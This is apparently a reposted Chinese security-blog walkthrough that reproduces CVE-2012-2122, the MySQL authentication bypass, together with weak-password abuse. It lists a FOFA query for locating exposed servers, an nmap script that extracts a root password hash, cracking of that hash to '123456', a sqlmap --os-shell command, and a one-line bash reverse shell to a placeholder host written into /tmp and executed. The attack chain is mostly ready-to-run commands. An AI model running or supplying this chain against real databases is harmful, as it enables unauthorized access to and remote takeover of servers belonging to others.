本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现-CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
MySQL是一个关系型数据库管理系统,由瑞典MySQL AB公司开发,属于Oracle 旗下产品。MySQL是最流行的关系型数据库管理系统之一,在WEB应用方面,MySQL是最好的RDBMS(Relational Database Management System,关系数据库管理系统) 应用软件之一。当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞。
0x03 漏洞复现
漏洞影响:所有的Mariadb和mysql版本:5.1.61、5.0.11、5.3.5、5.5.22
FOFA: app=”mysql”
1.nmap使用mysql-vuln-cve2012-2122爆破Mysql,得到一个mysql5加密值
6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
nmap -sV -T4 -p3306 --script=mysql-vuln-cve2012-2122 x.x.x.x
2.到CMD5解密,得到密码为123456,即账号:root 密码:123456
CMD5地址为:https://www.cmd5.com/
3.利用sqlmap连接,连接成功,权限为mysql
<strong>sqlmap -d \"mysql://root:123456@x.x.x.x:3306/test\" --os-shell --flush-session</strong>
4.写入反弹shell的sh脚本到tmp目录,且赋予可执行权限,写入成功
echo \"bash -i >& /dev/tcp/x.x.x.x/7777 0>&1\" > /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh
THE END
暂无评论内容